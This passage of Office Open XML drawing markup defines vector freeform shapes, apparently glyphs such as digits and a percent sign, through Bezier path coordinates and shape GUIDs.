                <a:gd name="T44" fmla="*/ 44 w 227"/>
                <a:gd name="T45" fmla="*/ 133 h 388"/>
                <a:gd name="T46" fmla="*/ 87 w 227"/>
                <a:gd name="T47" fmla="*/ 67 h 388"/>
                <a:gd name="T48" fmla="*/ 44 w 227"/>
                <a:gd name="T49" fmla="*/ 102 h 388"/>
                <a:gd name="T50" fmla="*/ 28 w 227"/>
                <a:gd name="T51" fmla="*/ 66 h 388"/>
                <a:gd name="T52" fmla="*/ 44 w 227"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 59 w 227"/>
                <a:gd name="T55" fmla="*/ 66 h 388"/>
                <a:gd name="T56" fmla="*/ 44 w 227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8">
                  <a:moveTo>
                    <a:pt x="198" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="24"/>
                    <a:pt x="201" y="21"/>
                    <a:pt x="201" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201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4" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="388"/>
                    <a:pt x="59" y="379"/>
                    <a:pt x="61" y="373"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="29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7" y="358"/>
                    <a:pt x="227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2" name="Freeform 194">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49017A66-4026-48D2-87AC-57D483D1A210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6553201" y="3067050"/>
              <a:ext cx="90488" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 129 w 234"/>
                <a:gd name="T1" fmla="*/ 105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1 h 215"/>
                <a:gd name="T16" fmla="*/ 115 w 234"/>
                <a:gd name="T17" fmla="*/ 81 h 215"/>
                <a:gd name="T18" fmla="*/ 78 w 234"/>
                <a:gd name="T19" fmla="*/ 31 h 215"/>
                <a:gd name="T20" fmla="*/ 101 w 234"/>
                <a:gd name="T21" fmla="*/ 15 h 215"/>
                <a:gd name="T22" fmla="*/ 81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8 w 234"/>
                <a:gd name="T45" fmla="*/ 200 h 215"/>
                <a:gd name="T46" fmla="*/ 73 w 234"/>
                <a:gd name="T47" fmla="*/ 185 h 215"/>
                <a:gd name="T48" fmla="*/ 115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29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8" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="31"/>
                    <a:pt x="101" y="31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3" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115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3" name="Freeform 195">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C41476B-005A-41E1-96EA-37BE3C4095E0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6686551" y="3128963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4" name="Freeform 196">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28641E8B-F3BB-4767-8969-ABE7D8EC55B4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6756401" y="3014663"/>
              <a:ext cx="85725" cy="155575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39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7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6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6 h 388"/>
                <a:gd name="T52" fmla="*/ 43 w 226"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 59 w 226"/>
                <a:gd name="T55" fmla="*/ 66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7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5" name="Freeform 197">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F564C9BB-AE6B-4A93-879A-B6FF78CBBD70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6854826" y="3067050"/>
              <a:ext cx="88900" cy="85725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7 w 234"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 227 w 234"/>
                <a:gd name="T7" fmla="*/ 16 h 215"/>
                <a:gd name="T8" fmla="*/ 207 w 234"/>
                <a:gd name="T9" fmla="*/ 0 h 215"/>
                <a:gd name="T10" fmla="*/ 149 w 234"/>
                <a:gd name="T11" fmla="*/ 0 h 215"/>
                <a:gd name="T12" fmla="*/ 129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4 w 234"/>
                <a:gd name="T31" fmla="*/ 31 h 215"/>
                <a:gd name="T32" fmla="*/ 103 w 234"/>
                <a:gd name="T33" fmla="*/ 105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1 w 234"/>
                <a:gd name="T51" fmla="*/ 185 h 215"/>
                <a:gd name="T52" fmla="*/ 136 w 234"/>
                <a:gd name="T53" fmla="*/ 200 h 215"/>
                <a:gd name="T54" fmla="*/ 156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7" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="31"/>
                    <a:pt x="227" y="31"/>
                    <a:pt x="227" y="16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9" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="0"/>
                    <a:pt x="129" y="0"/>
                    <a:pt x="129" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="31"/>
                    <a:pt x="140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90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4" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="105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7" y="215"/>
                    <a:pt x="99" y="215"/>
                    <a:pt x="99" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="185"/>
                    <a:pt x="89" y="185"/>
                    <a:pt x="73" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="185"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="185"/>
                    <a:pt x="136" y="185"/>
                    <a:pt x="136" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="215"/>
                    <a:pt x="148" y="215"/>
                    <a:pt x="156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6" name="Freeform 198">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04AB3457-AFC0-4C96-9879-4CF4B262704C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6988176" y="3128963"/>
              <a:ext cx="23813" cy="2381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7" name="Freeform 199">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84AA3839-7D04-469B-94D5-77E8CE38A7F7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7056439" y="3014663"/>
              <a:ext cx="87313" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 198 w 227"/>
                <a:gd name="T1" fmla="*/ 29 h 388"/>
                <a:gd name="T2" fmla="*/ 201 w 227"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 184 w 227"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 166 w 227"/>
                <a:gd name="T7" fmla="*/ 16 h 388"/>
                <a:gd name="T8" fmla="*/ 29 w 227"/>
                <a:gd name="T9" fmla="*/ 359 h 388"/>
                <a:gd name="T10" fmla="*/ 26 w 227"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 44 w 227"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 61 w 227"/>
                <a:gd name="T15" fmla="*/ 373 h 388"/>
                <a:gd name="T16" fmla="*/ 198 w 227"/>
                <a:gd name="T17" fmla="*/ 29 h 388"/>
                <a:gd name="T18" fmla="*/ 227 w 227"/>
                <a:gd name="T19" fmla="*/ 321 h 388"/>
                <a:gd name="T20" fmla="*/ 184 w 227"/>
                <a:gd name="T21" fmla="*/ 255 h 388"/>
                <a:gd name="T22" fmla="*/ 140 w 227"/>
                <a:gd name="T23" fmla="*/ 321 h 388"/>
                <a:gd name="T24" fmla="*/ 184 w 227"/>
                <a:gd name="T25" fmla="*/ 388 h 388"/>
                <a:gd name="T26" fmla="*/ 227 w 227"/>
                <a:gd name="T27" fmla="*/ 321 h 388"/>
                <a:gd name="T28" fmla="*/ 184 w 227"/>
                <a:gd name="T29" fmla="*/ 357 h 388"/>
                <a:gd name="T30" fmla="*/ 168 w 227"/>
                <a:gd name="T31" fmla="*/ 321 h 388"/>
                <a:gd name="T32" fmla="*/ 184 w 227"/>
                <a:gd name="T33" fmla="*/ 286 h 388"/>
                <a:gd name="T34" fmla="*/ 199 w 227"/>
                <a:gd name="T35" fmla="*/ 321 h 388"/>
                <a:gd name="T36" fmla="*/ 184 w 227"/>
                <a:gd name="T37" fmla="*/ 357 h 388"/>
                <a:gd name="T38" fmla="*/ 87 w 227"/>
                <a:gd name="T39" fmla="*/ 67 h 388"/>
                <a:gd name="T40" fmla="*/ 44 w 227"/>
                <a:gd name="T41" fmla="*/ 0 h 388"/>
                <a:gd name="T42" fmla="*/ 0 w 227"/>
                <a:gd name="T43" fmla="*/ 66 h 388"/>
                <a:gd name="T44" fmla="*/ 44 w 227"/>
                <a:gd name="T45" fmla="*/ 133 h 388"/>
                <a:gd name="T46" fmla="*/ 87 w 227"/>
                <a:gd name="T47" fmla="*/ 67 h 388"/>
                <a:gd name="T48" fmla="*/ 44 w 227"/>
                <a:gd name="T49" fmla="*/ 102 h 388"/>
                <a:gd name="T50" fmla="*/ 28 w 227"/>
                <a:gd name="T51" fmla="*/ 66 h 388"/>
                <a:gd name="T52" fmla="*/ 44 w 227"/>
                <a:gd name="T53" fmla="*/ 31 h 388"/>
                <a:gd name="T54" fmla="*/ 59 w 227"/>
                <a:gd name="T55" fmla="*/ 66 h 388"/>
                <a:gd name="T56" fmla="*/ 44 w 227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8">
                  <a:moveTo>
                    <a:pt x="198" y="29"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="24"/>
                    <a:pt x="201" y="21"/>
                    <a:pt x="201" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="9"/>
                    <a:pt x="193" y="0"/>
                    <a:pt x="184" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="0"/>
                    <a:pt x="168" y="10"/>
                    <a:pt x="166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4" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="388"/>
                    <a:pt x="59" y="379"/>
                    <a:pt x="61" y="373"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="29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4" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="255"/>
                    <a:pt x="140" y="284"/>
                    <a:pt x="140" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="358"/>
                    <a:pt x="159" y="388"/>
                    <a:pt x="184" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="388"/>
                    <a:pt x="227" y="358"/>
                    <a:pt x="227" y="321"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="184" y="357"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="357"/>
                    <a:pt x="168" y="343"/>
                    <a:pt x="168" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="299"/>
                    <a:pt x="178" y="286"/>
                    <a:pt x="184" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="286"/>
                    <a:pt x="199" y="299"/>
                    <a:pt x="199" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="343"/>
                    <a:pt x="190" y="357"/>
                    <a:pt x="184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8" name="Freeform 200">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B712858-0EFB-4DDA-BD74-217F89678DB0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7154864" y="3067050"/>
              <a:ext cx="90488" cy="85725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9" name="Freeform 201">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A42CFFA5-F4B8-4FA9-982E-A554988D40D6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288214" y="3128963"/>
              <a:ext cx="23813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0" name="Freeform 202">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B7B5665-95FB-4607-A04F-1DACB8CE049E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2547939" y="3267075"/>
              <a:ext cx="79375" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 36 w 209"/>
                <a:gd name="T1" fmla="*/ 142 h 316"/>
                <a:gd name="T2" fmla="*/ 134 w 209"/>
                <a:gd name="T3" fmla="*/ 31 h 316"/>
                <a:gd name="T4" fmla="*/ 161 w 209"/>
                <a:gd name="T5" fmla="*/ 39 h 316"/>
                <a:gd name="T6" fmla="*/ 156 w 209"/>
                <a:gd name="T7" fmla="*/ 53 h 316"/>
                <a:gd name="T8" fmla="*/ 178 w 209"/>
                <a:gd name="T9" fmla="*/ 75 h 316"/>
                <a:gd name="T10" fmla="*/ 200 w 209"/>
                <a:gd name="T11" fmla="*/ 52 h 316"/>
                <a:gd name="T12" fmla="*/ 134 w 209"/>
                <a:gd name="T13" fmla="*/ 0 h 316"/>
                <a:gd name="T14" fmla="*/ 0 w 209"/>
                <a:gd name="T15" fmla="*/ 161 h 316"/>
                <a:gd name="T16" fmla="*/ 106 w 209"/>
                <a:gd name="T17" fmla="*/ 316 h 316"/>
                <a:gd name="T18" fmla="*/ 209 w 209"/>
                <a:gd name="T19" fmla="*/ 214 h 316"/>
                <a:gd name="T20" fmla="*/ 110 w 209"/>
                <a:gd name="T21" fmla="*/ 113 h 316"/>
                <a:gd name="T22" fmla="*/ 36 w 209"/>
                <a:gd name="T23" fmla="*/ 142 h 316"/>
                <a:gd name="T24" fmla="*/ 106 w 209"/>
                <a:gd name="T25" fmla="*/ 285 h 316"/>
                <a:gd name="T26" fmla="*/ 44 w 209"/>
                <a:gd name="T27" fmla="*/ 231 h 316"/>
                <a:gd name="T28" fmla="*/ 41 w 209"/>
                <a:gd name="T29" fmla="*/ 222 h 316"/>
                <a:gd name="T30" fmla="*/ 41 w 209"/>
                <a:gd name="T31" fmla="*/ 220 h 316"/>
                <a:gd name="T32" fmla="*/ 41 w 209"/>
                <a:gd name="T33" fmla="*/ 215 h 316"/>
                <a:gd name="T34" fmla="*/ 40 w 209"/>
                <a:gd name="T35" fmla="*/ 200 h 316"/>
                <a:gd name="T36" fmla="*/ 108 w 209"/>
                <a:gd name="T37" fmla="*/ 144 h 316"/>
                <a:gd name="T38" fmla="*/ 174 w 209"/>
                <a:gd name="T39" fmla="*/ 214 h 316"/>
                <a:gd name="T40" fmla="*/ 106 w 209"/>
                <a:gd name="T41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6">
                  <a:moveTo>
                    <a:pt x="36" y="142"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="71"/>
                    <a:pt x="90" y="31"/>
                    <a:pt x="134" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="31"/>
                    <a:pt x="159" y="36"/>
                    <a:pt x="161" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="41"/>
                    <a:pt x="156" y="44"/>
                    <a:pt x="156" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="65"/>
                    <a:pt x="165" y="75"/>
                    <a:pt x="178" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="75"/>
                    <a:pt x="200" y="66"/>
                    <a:pt x="200" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="27"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="134" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="0"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="279"/>
                    <a:pt x="56" y="316"/>
                    <a:pt x="106" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="316"/>
                    <a:pt x="209" y="274"/>
                    <a:pt x="209" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="157"/>
                    <a:pt x="165" y="113"/>
                    <a:pt x="110" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="113"/>
                    <a:pt x="58" y="121"/>
                    <a:pt x="36" y="142"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="106" y="285"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="285"/>
                    <a:pt x="54" y="261"/>
                    <a:pt x="44" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="228"/>
                    <a:pt x="42" y="225"/>
                    <a:pt x="41" y="222"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="41" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="212"/>
                    <a:pt x="40" y="203"/>
                    <a:pt x="40" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="169"/>
                    <a:pt x="70" y="144"/>
                    <a:pt x="108" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="144"/>
                    <a:pt x="174" y="177"/>
                    <a:pt x="174" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="257"/>
                    <a:pt x="142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1" name="Freeform 203">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CDC79A8-CB2F-4EAA-8E64-B810DC93266A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2646364" y="3267075"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 162 w 218"/>
                <a:gd name="T1" fmla="*/ 144 h 316"/>
                <a:gd name="T2" fmla="*/ 203 w 218"/>
                <a:gd name="T3" fmla="*/ 70 h 316"/>
                <a:gd name="T4" fmla="*/ 110 w 218"/>
                <a:gd name="T5" fmla="*/ 0 h 316"/>
                <a:gd name="T6" fmla="*/ 15 w 218"/>
                <a:gd name="T7" fmla="*/ 59 h 316"/>
                <a:gd name="T8" fmla="*/ 37 w 218"/>
                <a:gd name="T9" fmla="*/ 82 h 316"/>
                <a:gd name="T10" fmla="*/ 59 w 218"/>
                <a:gd name="T11" fmla="*/ 60 h 316"/>
                <a:gd name="T12" fmla="*/ 55 w 218"/>
                <a:gd name="T13" fmla="*/ 46 h 316"/>
                <a:gd name="T14" fmla="*/ 110 w 218"/>
                <a:gd name="T15" fmla="*/ 31 h 316"/>
                <a:gd name="T16" fmla="*/ 169 w 218"/>
                <a:gd name="T17" fmla="*/ 71 h 316"/>
                <a:gd name="T18" fmla="*/ 148 w 218"/>
                <a:gd name="T19" fmla="*/ 114 h 316"/>
                <a:gd name="T20" fmla="*/ 102 w 218"/>
                <a:gd name="T21" fmla="*/ 129 h 316"/>
                <a:gd name="T22" fmla="*/ 66 w 218"/>
                <a:gd name="T23" fmla="*/ 146 h 316"/>
                <a:gd name="T24" fmla="*/ 86 w 218"/>
                <a:gd name="T25" fmla="*/ 161 h 316"/>
                <a:gd name="T26" fmla="*/ 109 w 218"/>
                <a:gd name="T27" fmla="*/ 161 h 316"/>
                <a:gd name="T28" fmla="*/ 183 w 218"/>
                <a:gd name="T29" fmla="*/ 224 h 316"/>
                <a:gd name="T30" fmla="*/ 110 w 218"/>
                <a:gd name="T31" fmla="*/ 285 h 316"/>
                <a:gd name="T32" fmla="*/ 39 w 218"/>
                <a:gd name="T33" fmla="*/ 257 h 316"/>
                <a:gd name="T34" fmla="*/ 45 w 218"/>
                <a:gd name="T35" fmla="*/ 241 h 316"/>
                <a:gd name="T36" fmla="*/ 23 w 218"/>
                <a:gd name="T37" fmla="*/ 219 h 316"/>
                <a:gd name="T38" fmla="*/ 0 w 218"/>
                <a:gd name="T39" fmla="*/ 243 h 316"/>
                <a:gd name="T40" fmla="*/ 110 w 218"/>
                <a:gd name="T41" fmla="*/ 316 h 316"/>
                <a:gd name="T42" fmla="*/ 218 w 218"/>
                <a:gd name="T43" fmla="*/ 224 h 316"/>
                <a:gd name="T44" fmla="*/ 162 w 218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316">
                  <a:moveTo>
                    <a:pt x="162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4"/>
                    <a:pt x="167" y="0"/>
                    <a:pt x="110" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="15" y="24"/>
                    <a:pt x="15" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="75"/>
                    <a:pt x="27" y="82"/>
                    <a:pt x="37" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="82"/>
                    <a:pt x="59" y="73"/>
                    <a:pt x="59" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="53"/>
                    <a:pt x="56" y="48"/>
                    <a:pt x="55" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="31"/>
                    <a:pt x="106" y="31"/>
                    <a:pt x="110" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="31"/>
                    <a:pt x="169" y="49"/>
                    <a:pt x="169" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="86"/>
                    <a:pt x="162" y="103"/>
                    <a:pt x="148" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="127"/>
                    <a:pt x="120" y="128"/>
                    <a:pt x="102" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="131"/>
                    <a:pt x="66" y="131"/>
                    <a:pt x="66" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="161"/>
                    <a:pt x="78" y="161"/>
                    <a:pt x="86" y="161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="109" y="161"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="161"/>
                    <a:pt x="183" y="195"/>
                    <a:pt x="183" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="254"/>
                    <a:pt x="156" y="285"/>
                    <a:pt x="110" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="285"/>
                    <a:pt x="52" y="280"/>
                    <a:pt x="39" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="254"/>
                    <a:pt x="45" y="251"/>
                    <a:pt x="45" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="229"/>
                    <a:pt x="35" y="219"/>
                    <a:pt x="23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9" y="316"/>
                    <a:pt x="110" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="316"/>
                    <a:pt x="218" y="270"/>
                    <a:pt x="218" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="188"/>
                    <a:pt x="194" y="159"/>
                    <a:pt x="162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2" name="Freeform 204">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{316707EE-3516-40B2-A648-669D8B9BAAA3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776539" y="3365500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3" name="Freeform 205">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8023A74-9705-43F2-977C-C83439B012F2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2840039" y="3270250"/>
              <a:ext cx="92075" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 237"/>
                <a:gd name="T1" fmla="*/ 111 h 307"/>
                <a:gd name="T2" fmla="*/ 76 w 237"/>
                <a:gd name="T3" fmla="*/ 20 h 307"/>
                <a:gd name="T4" fmla="*/ 56 w 237"/>
                <a:gd name="T5" fmla="*/ 0 h 307"/>
                <a:gd name="T6" fmla="*/ 20 w 237"/>
                <a:gd name="T7" fmla="*/ 0 h 307"/>
                <a:gd name="T8" fmla="*/ 0 w 237"/>
                <a:gd name="T9" fmla="*/ 15 h 307"/>
                <a:gd name="T10" fmla="*/ 20 w 237"/>
                <a:gd name="T11" fmla="*/ 30 h 307"/>
                <a:gd name="T12" fmla="*/ 42 w 237"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 42 w 237"/>
                <a:gd name="T15" fmla="*/ 284 h 307"/>
                <a:gd name="T16" fmla="*/ 59 w 237"/>
                <a:gd name="T17" fmla="*/ 304 h 307"/>
                <a:gd name="T18" fmla="*/ 76 w 237"/>
                <a:gd name="T19" fmla="*/ 282 h 307"/>
                <a:gd name="T20" fmla="*/ 134 w 237"/>
                <a:gd name="T21" fmla="*/ 307 h 307"/>
                <a:gd name="T22" fmla="*/ 237 w 237"/>
                <a:gd name="T23" fmla="*/ 197 h 307"/>
                <a:gd name="T24" fmla="*/ 140 w 237"/>
                <a:gd name="T25" fmla="*/ 86 h 307"/>
                <a:gd name="T26" fmla="*/ 76 w 237"/>
                <a:gd name="T27" fmla="*/ 111 h 307"/>
                <a:gd name="T28" fmla="*/ 76 w 237"/>
                <a:gd name="T29" fmla="*/ 209 h 307"/>
                <a:gd name="T30" fmla="*/ 76 w 237"/>
                <a:gd name="T31" fmla="*/ 173 h 307"/>
                <a:gd name="T32" fmla="*/ 137 w 237"/>
                <a:gd name="T33" fmla="*/ 117 h 307"/>
                <a:gd name="T34" fmla="*/ 203 w 237"/>
                <a:gd name="T35" fmla="*/ 197 h 307"/>
                <a:gd name="T36" fmla="*/ 133 w 237"/>
                <a:gd name="T37" fmla="*/ 277 h 307"/>
                <a:gd name="T38" fmla="*/ 76 w 237"/>
                <a:gd name="T39" fmla="*/ 20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76" y="111"/>
                  </a:move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4"/>
                    <a:pt x="59" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="304"/>
                    <a:pt x="76" y="294"/>
                    <a:pt x="76" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="303"/>
                    <a:pt x="118" y="307"/>
                    <a:pt x="134" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="307"/>
                    <a:pt x="237" y="260"/>
                    <a:pt x="237" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="135"/>
                    <a:pt x="193" y="86"/>
                    <a:pt x="140" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="86"/>
                    <a:pt x="93" y="95"/>
                    <a:pt x="76" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="76" y="209"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="76" y="173"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="143"/>
                    <a:pt x="105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6" y="233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4" name="Freeform 206">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5138F44-44A0-42E2-B966-A5D31CF14A58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946401" y="3267075"/>
              <a:ext cx="84138" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 166 w 217"/>
                <a:gd name="T1" fmla="*/ 38 h 318"/>
                <a:gd name="T2" fmla="*/ 63 w 217"/>
                <a:gd name="T3" fmla="*/ 294 h 318"/>
                <a:gd name="T4" fmla="*/ 80 w 217"/>
                <a:gd name="T5" fmla="*/ 318 h 318"/>
                <a:gd name="T6" fmla="*/ 97 w 217"/>
                <a:gd name="T7" fmla="*/ 298 h 318"/>
                <a:gd name="T8" fmla="*/ 207 w 217"/>
                <a:gd name="T9" fmla="*/ 40 h 318"/>
                <a:gd name="T10" fmla="*/ 217 w 217"/>
                <a:gd name="T11" fmla="*/ 23 h 318"/>
                <a:gd name="T12" fmla="*/ 198 w 217"/>
                <a:gd name="T13" fmla="*/ 8 h 318"/>
                <a:gd name="T14" fmla="*/ 33 w 217"/>
                <a:gd name="T15" fmla="*/ 8 h 318"/>
                <a:gd name="T16" fmla="*/ 17 w 217"/>
                <a:gd name="T17" fmla="*/ 0 h 318"/>
